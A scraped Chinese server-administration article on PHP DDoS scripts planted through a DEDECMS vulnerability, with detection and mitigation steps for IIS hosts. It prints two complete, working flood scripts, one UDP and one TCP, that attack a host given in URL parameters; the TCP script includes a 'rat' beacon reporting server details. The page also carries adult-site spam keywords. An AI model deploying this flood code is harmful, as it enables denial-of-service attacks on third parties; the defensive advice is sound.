国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 服務器 > Web服務器 > 正文

php對外發(fā)包引發(fā)服務器崩潰的終極解決方法分享[推薦]

2024-09-01 13:45:23
字體:
供稿:網(wǎng)友
一、php對外發(fā)包分析
用php代碼調(diào)用sockets,直接用服務器的網(wǎng)絡攻擊別的IP,常見代碼如下:

復制代碼 代碼如下:


$packets = 0;
$ip = $_GET[/'ip/'];
$rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[/'time/'];
$time = time();
print /"Flooded: $ip on port $rand
/";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with
$packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /".
round($packets/$exec_time, 2) . /" packets/s //n/";
?>


二、表現(xiàn)特征
一打開IIS,服務器的流出帶寬就用光-----就是說服務器不斷向別人發(fā)包,這個情況和受到DDOS攻擊是不同的,DDOS是服務器不斷收到大量數(shù)據(jù)包.
近期由于DEDECMS出現(xiàn)漏洞而導致大量服務器出現(xiàn)這個問題.
如何快速找到這些站?
你可以打開日志
C:/Windows/System32/LogFiles/HTTPERR/httperr...log,打開今天時間的文件,
里面有類似這樣的記錄:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
最后三項 783 Disabled 30_FreeHost_1
783就是這個站在IIS中的ID
30_FreeHost_1就是所在池

三、解決辦法
1.按上述找到這個網(wǎng)站后停止它.或停止池,并重啟IIS.
2.在IP策略,或防火墻中,禁止所有udp向外發(fā)送
在星外最新版本的安全包中,已帶有4.0版本的IP策略【下載safe包】,您導入后就直接可以限制了外發(fā)的UDP包。下載這個包,之后導入安全策略。但這個策略并沒有關閉DNS端口,部分攻擊還是有效.
為了解決這個問題,你也可以調(diào)整IP策略,限制udp只能訪問特定的DNS服務器IP,如8.8.8.8,除非黑客攻擊這個IP,不然攻擊也是無效的,你可以在網(wǎng)卡DNS中設置一個你才知道的DNS IP,并且不要公開,然后調(diào)用IP策略中的udp open部分就可以解決.(打開IP策略的屬性,雙擊open,將open中的兩條udp記錄刪除任意一條,在保留的這條中,雙擊,改成 地址 從源地址 任何地址 到目標地址 "特定IP 這個IP就是設置為你自己的DNS IP,如8.8.8.8" 保存后就行了 )
在2011-4-27,我們上傳了新的安全包,里面有一個"星外虛擬主機管理平臺IP策略關閉所有UDP端口用.ipsec"文件,您可以導入它并啟用,就可以關閉所有udp端口,就可以完全防止這類攻擊,但是,這個策略由于關閉了DNS端口,會造成的這臺服務器上無法用IE訪問任何域名,因此,用戶的采集功能也就用不了.(同樣,如果在主控網(wǎng)站上用了這個策略,就會造成的受控自檢不通過,因為解析不了域名,另外,部分用戶反映此策略會造成的mysql不正常)

3.用一流信息監(jiān)控,在SQL攔截及網(wǎng)址攔截中,攔截port=這個關鍵詞(其他關鍵詞可以刪除.)
4.也可以直接禁止上面的代碼,如改win/php.ini后重啟IIS
ignore_user_abort = On
(注意前面的;號要刪除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但這樣會造成很多php程序都不正常.
另外,這也表明你的服務器安全做得不錯,如果能入侵.黑客就直接提權了,還DOS做什么?

近期已有新的基于TCP攻擊的PHPDDOS代碼如下:

復制代碼 代碼如下:


set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".
php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
exit;
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 69){
break;
}
$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>


同樣,可以采有以下解決辦法:
1.也可以直接禁止上面的代碼,如改win/php.ini后重啟IIS
ignore_user_abort = On
(注意前面的;號要刪除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但這樣會造成很多php程序都不正常.
2.在IP策略中禁止所有外訪的TCP數(shù)據(jù)包,但這樣會造成的采集功能無效,也不能用在主控服務器上。
3.在服務器要用關鍵詞tcp:或udp:搜索所有php類文件,找到攻擊文件,刪除它。

以上方法供 vps、服務器托管用戶學習!
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 华坪县| 淅川县| 夏河县| 皮山县| 邢台县| 沭阳县| 延寿县| 平顺县| 安化县| 中西区| 遂昌县| 古丈县| 介休市| 富阳市| 开平市| 巴东县| 尚志市| 四平市| 河北区| 博白县| 榆林市| 云阳县| 开鲁县| 越西县| 蕲春县| 渭源县| 永安市| 涟源市| 漳浦县| 罗山县| 民权县| 扎赉特旗| 霍林郭勒市| 个旧市| 库车县| 巢湖市| 乐安县| 原阳县| 景宁| 栾城县| 香河县|